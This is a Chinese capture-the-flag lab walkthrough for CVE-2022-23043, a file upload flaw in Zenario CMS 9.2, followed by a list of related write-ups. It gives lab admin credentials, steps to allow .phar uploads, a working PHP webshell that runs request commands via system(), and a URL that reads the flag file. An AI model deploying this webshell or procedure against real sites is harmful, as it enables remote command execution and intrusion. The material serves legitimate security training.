[春秋云镜]CVE-2022-23043
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
靶场介绍
Zenario CMS 9.2 文件上传漏洞,攻击者可上传webshell执行任意命令。登陆信息:admin/adminqwe12
春秋云镜开启靶场:
http://47.95.3.91:13095/
开启靶场后需要先配置一下文档存放位置 (否则无法getshell)
http://47.95.3.91:13095/admin
admin/adminqwe12 登录后台
文档存放位置
都修改为/tmp
修改好之后点击继续
/organizer.php#zenario__organizer/panels/start_page
访问http://47.95.3.91:13095/organizer.php#zenario__organizer/panels/start_page
Configuration--File/MIME Types
创建文件类型
格式为phar 类型为 text/plain 保存
上传文档
上传一个phar的木马文件
<?php
if($_REQUEST['s']) {system($_REQUEST['s']);} else phpinfo();
?>
上传文档 选择public
Actions---View public link
http://47.95.3.91:13095/public/downloads/E90cZ/123.phar?s=cat%20../../../../../../../flag
成功获取flag
[春秋云镜]CVE-2022-23043相关推荐
- 春秋云镜 CVE-2022-24223
春秋云镜 CVE-2022-24223 AtomCMS SQL注入漏洞 靶标介绍 Elite Graphix Elite Cms是印度Elite Graphix公司的一个用 Php 语言编写的 Web ...
- 春秋云镜wp day1
春秋云镜wp day1 (qq.com) 建议关注公众号 websec.space,以后文章来csdn备份一份 今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷, ...
- [春秋云镜]CVE-2022-23134
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Zabbix Sia Zabbix是拉脱 ...
- [春秋云镜]CVE-2020-19960,CVE-2020-19961
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 zz cms 2019 存在sql注入漏 ...
- 【春秋云镜 CVE-2022-30887wp】
春秋云镜 CVE-2022-30887wp 开始愉快的打靶之旅吧 收集信息 任意文件上传 开始愉快的打靶之旅吧 春秋云镜链接 https://yunjing.ichunqiu.com 靶标介绍: 多语 ...
- [春秋云镜]CVE-2022-2073
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Grav CMS 可以通过 Twig 来 ...
- [春秋云镜]CVE-2022-24263
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Hospital Management ...
- 春秋云镜 CVE-2022-24112
春秋云镜 CVE-2022-24112 Apache APISIX batch-requests SSRF RCE 漏洞 靶标介绍 Apache Apisix是美国阿帕奇(Apache)基金会的一个云 ...
- 春秋云镜 CVE-2022-22947
春秋云镜 CVE-2022-22947 Spring Cloud Gateway spel 远程代码执行 靶标介绍 Spring Cloud Gateway远程代码执行漏洞(CVE-2022-2294 ...
最新文章
- asp.net利用Web Service实现短信发送致手机
- 研究揭秘:神经网络越大、表现越好的“神秘力量”
- VMware安装MacOSx系统
- lucene4.7 高亮功能(八)
- BufferedWriter 和 BufferedReader 的基本用法,附演示程序。以及一个复制文本文件的程序
- 软件测试管理是什么?
- android在线图标生成工具,图标在线生成工具Android Asset Studio的使用
- Java项目集成工作流引擎解决方案及实例展示(前后分离版)
- 欧美音乐史上最经典的歌曲
- python36 +tkinter制作12306火车票查询系统
- 26设计模式之建造者模式
- jquery+ajx post/get 实例
- #pragma warning 启用和禁用warning
- SPA(单页面web应用)和MPA(多页面web应用)的区别
- 《社交红利》读书总结--如何从微信微博QQ空间等社交网络带走海量用户、流量与收入...
- 防黑客攻击手法之APP安全防护
- node中的global对象
- 使用pip安装pymqsql,出现Cannot unpack file xxx的问题的解决以及pip安装速度慢或出现readtime out问题的解决。
- 量子计算机 郭光灿,郭光灿(中国科学院院士、量子信息学家)_百度百科
- 实验四 面向对象的分析(软件工程)